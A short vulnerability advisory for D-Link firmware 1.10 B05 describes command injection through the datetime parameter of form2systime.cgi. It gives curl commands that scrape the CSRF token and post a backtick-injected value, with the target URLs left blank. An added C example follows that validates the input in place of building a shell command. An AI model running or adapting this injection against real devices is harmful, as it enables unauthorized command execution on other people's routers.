Vendor: D-Link
Firmware version: 1.10 B05
Exploit Author: [email protected]
Vendor Homepage:
Hardware Link:
In the handler of the route /goform/form2systime.cgi, the value of the parameter datetime is used to construct the command date -s "%s", which is later passed to system. A crafted request can therefore lead to command injection.
There's a random token required by the route, which is used as a mitigation against CSRF. So first we need to get its value:
TOKENID=`curl -s | grep tokenid | head -1 | grep -o 'value="[0-9]*"' | cut -f 2 -d = | tr -d '"'`
Then we could send the crafted parameter along with the token to the route:
curl -i -X POST -d tokenid=$TOKENID -d 'datetime=`sleep 5`-:'
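
For the fix side, the following is an added example, not code from the firmware or from the advisory author: a strict allowlist check on the datetime value that yields a timestamp for a clock-setting call instead of a shell command. The input format "YYYY-MM-DD HH:MM:SS" and the function names parse_datetime and datetime_to_epoch are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <time.h>

/* Pattern described in the advisory (shown only as a comment):
 *     sprintf(cmd, "date -s \"%s\"", datetime); system(cmd);
 * Hardened form below. Assumed input format, not taken from the firmware:
 * "YYYY-MM-DD HH:MM:SS". */

/* Returns 0 and fills *out if s matches the assumed format exactly, else -1. */
int parse_datetime(const char *s, struct tm *out)
{
    static const char shape[] = "dddd-dd-dd dd:dd:dd";  /* d = ASCII digit */
    int y, mo, d, h, mi, sec;
    size_t i;

    if (s == NULL || strlen(s) != sizeof(shape) - 1)
        return -1;
    for (i = 0; shape[i] != '\0'; i++)   /* every byte must fit the shape */
        if (shape[i] == 'd' ? !isdigit((unsigned char)s[i]) : s[i] != shape[i])
            return -1;
    if (sscanf(s, "%4d-%2d-%2d %2d:%2d:%2d", &y, &mo, &d, &h, &mi, &sec) != 6)
        return -1;
    if (y < 1970 || y > 2037 || mo < 1 || mo > 12 || d < 1 || d > 31 ||
        h > 23 || mi > 59 || sec > 59)
        return -1;
    memset(out, 0, sizeof(*out));
    out->tm_year = y - 1900; out->tm_mon = mo - 1; out->tm_mday = d;
    out->tm_hour = h; out->tm_min = mi; out->tm_sec = sec;
    out->tm_isdst = -1;
    return 0;
}

/* Converts a validated value to epoch seconds, or (time_t)-1 on rejection.
 * The result is meant for clock_settime(CLOCK_REALTIME, ...), so the request
 * data never becomes part of a command string. */
time_t datetime_to_epoch(const char *s)
{
    struct tm tm;
    return parse_datetime(s, &tm) == 0 ? mktime(&tm) : (time_t)-1;
}

int main(void)
{
    /* Constructed inputs: a well-formed value and one with a shell metacharacter. */
    printf("%d\n", datetime_to_epoch("2024-01-02 03:04:05") != (time_t)-1);
    printf("%d\n", datetime_to_epoch("2024-01-02 03:04:0;") != (time_t)-1);
    return 0;
}
```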